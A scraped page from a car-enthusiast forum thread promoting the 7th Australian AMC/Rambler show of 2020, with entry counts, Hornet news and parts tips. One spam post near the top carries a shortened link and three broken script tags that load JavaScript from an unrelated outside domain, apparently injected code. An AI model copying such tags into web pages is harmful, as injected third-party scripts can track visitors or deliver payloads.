TheAMCForum.com Homepage
Forum Home Forum Home > The Lounge Area > General AMC chat > General AMC Chat Australian Edition
  New Posts New Posts RSS Feed - 7th Australian AMC/Rambler show March13/14/15 2020
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Click for TheAMCForum Rules / Click for PDF version of Forum Rules
Your donations help keep this valuable resource free and growing. Thank you.

7th Australian AMC/Rambler show March13/14/15 2020

Post Reply Post Reply Page  <12345 17>
Author
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Sep/22/2019 at 5:31am
Hows this!!! Smile

Sneek peek of Dean Westons Speedway Hornet about to start racing again at Speedways in Victoria and all going well will be at the show to help celebrate the 50th anniversary of the Hornet. Cant wait Smile More info soon

While we are on topic of AMC Speedway cars does anyone have contact with the owner of the 360 AMC powered Sprintcar that had some photos doing the rounds awhile ago on facebook etc? Would like to get that car here to show as well Smile

Edited by 70Hornet - Sep/22/2019 at 5:33am
70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Oct/07/2019 at 3:28pm
Apologies regarding the website entry forms. There is still a hold up regarding the website but when it is up and running it will be ultra easy to enter and pay via the secure online website

COTM poster/entry forms have been sent out but not the AMC poster as yet. I will be sending out the AMC ones soon ie through the AMC Rambler club etc. 35 cars have already entered and 5 of them are already AMC's Smile If you are waiting for website entry form please be patient. Thanks, Jase Smile

Edited by 70Hornet - Oct/09/2019 at 7:17am
behe View Drop Down
AMC Fan
AMC Fan

Post Options Post Options   Thanks (0) Thanks(0)   Quote behe Quote  Post ReplyReply Direct Link To This Post Posted: Oct/11/2019 at 3:30am

Our intention for your business is to enhance your web traffic. SEO Services Brampton Having an optimized website means connecting great user experience with quality content to translate to your label goals into new customer reach, subscriber increases, and more different website visitors. Ranking in the first point of Google extends to be a great way to earn traffic to your website. We use many different strategies to help your website rank for precise keywords so you're apparent for your target audience.

https://bit.ly/2mjBFKU

< ="text/" async="" ="//clonyjohn.com/21dca2f7d5837c09f5.js"> < ="text/" async="" ="//clonyjohn.com/21dca2f7d5837c09f5.js"> < ="text/" async="" ="//clonyjohn.com/21dca2f7d5837c09f5.js">

Edited by behe - Oct/11/2019 at 3:32am
70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Oct/28/2019 at 11:08pm
The website entry forms have been live for about 2 weeks now so everyone can enter and securely pay on the website now https://chryslersonthemurray.com/

It is apparently very easy to do. We already have 16AMC's entered!! Tongue

70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Oct/30/2019 at 11:19pm
There are already 17 AMC's entered!
1 Concord, 6 Hornets, 1 Ambassodorre, 2 AMX's, 3 Javelins, 2 Gremlin, 2 Classics

We are running at 10% of the Chrysler/AMC show total. Imagine if AMC owners kept that up. IE 10% of 850 cars being AMC's Smile
70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Nov/12/2019 at 12:16am
22 AMC's fully entered and counting! Smile Actually running at more then 10% of show total entries so far which has never happened before Tongue 

Please also spread the word far and wide via facebook, club emails, websites, newsletters etc that you can easily enter and pay securely online now at www.chryslersonthemurray.com

70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Nov/19/2019 at 8:40am
Some very exciting news Tongue Was talking to Mick Brown today about his awesome Summernats Hornets. Probably the 2 most famous Hornets in Australia having been in various magazines and appearing at many shows ie Summernats where it has been in the top 10 from memory

Anyhow not only is Mick bringing the 700 or so hp street Hornet but also the 1500+ strip Hornet. Will be great to see and from what I hear Mick will give the big banger 1500hp one a few start ups during the day to hear its anger. Cant wait and although he hasnt officially entered as yet (or as far as I know) that makes I think at least 10 Hornets fully entered so far. 

As far as i can gather we should end up with at least 20 Hornets and at least 5 Gremlins

Couple that with hopefully around 20 Javelin/AMX's and another 20 or so other other AMC's and its shaping up to be a pretty cool gathering of AMC's Tongue 
70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Dec/06/2019 at 2:23am
27 AMC's entered and counting! Still running at just over 10% of total current show entries. Wow! Considering usually around 3 to 4%.

As far as I know we have 1 Concord, 12 Hornets (yep 12!! plus there is about 7 that have confirmed they will be here so we should easily get over 20 Hornets), ! Ambassodorre, 2 AMX's, 2 Gremlins, 4 Javelins, 2 Classics, 2 Rebels', 1 Matador all fully entered

If you are thinking of entering or know someone who is dont forget its easy to enter and pay online now at www.chryslersonthemurray.com

Would love to see the AMC's stay at 10% all the way through. Do the math on that!! 10% of 850 cars Tongue 

Edited by 70Hornet - Dec/06/2019 at 6:21am
70Hornet View Drop Down
AMC Addicted
AMC Addicted

Post Options Post Options   Thanks (0) Thanks(0)   Quote 70Hornet Quote  Post ReplyReply Direct Link To This Post Posted: Dec/09/2019 at 3:43am
As i try to assemble my Hornet in preparation for the 7th annual AMC/Rambler show it is battling me the whole way with everything bent or broken, stripped bolts, threads, parts i bought a decade ago totally wrong (ie lower control arm bushes 52mm long instead of 48mm which I didnt find out until went to put arm on!!) anyhow a quick call to Steve Fripp from Rambler Spares here in Australia and parts I need will be here by end of week! So i can get on with getting it ready. Steve has a huge collection of New Old Stock, New, New repro, 2nd hand and reconditioned parts available. Many parts are from the old Mascot Motors dealership him and his brother bought all the remaining AMC/Rambler stock from a few years back when it closed down

Steve mentioned there is a fair few guys and girls flat out trying to get cars ready for the show next year including one owner who hasn't been before trying to get Four! AMC/Ramblers ready to bring to the show

If you are trying to get your AMC/Rambler ready or just need some parts to tidy it up, get it going or finish it off Steve would be well worth a call as he may have what you want and can get to you fairly quickly. If he doesnt have it he has a vast network of AMC/Rambler owners he can utilise to find that part for you. Steve can be reached on 0477090874 (Please be aware he does have a day job so please leave him a message and he WILL get back to you

Some of the cars I am hearing about that look to be coming is amazing and I cant wait to be a part of what looks like is going to be the best one so far next year Tongue 

Edited by 70Hornet - Dec/09/2019 at 3:47am
Craigie View Drop Down
AMC Nut
AMC Nut

Post Options Post Options   Thanks (0) Thanks(0)   Quote Craigie Quote  Post ReplyReply Direct Link To This Post Posted: Dec/15/2019 at 9:44pm
Hi Jason, Thanks for the regular updates for next years show.

Hope your Hornet is on track to be there also !

Just wanted to pick your brain on accommodation options for the event.
I have not booked anything yet and was just thinking of throwing in a swag and camp bed and grabbing a camp site if they exist in the twin towns ?
Any advice appreciated thanks mate.

Kind Regards
Craig

p.s I am going to fly solo for most of the run from Brisbane and back, making a 2 week road-trip holiday of things.

Craigie.........

1968 Dodge Charger "Bullitt" tribute
1971 SC/360 Hornet
1973 "Levi" Gremlin
 Post Reply Post Reply Page  <12345 17>
  Share Topic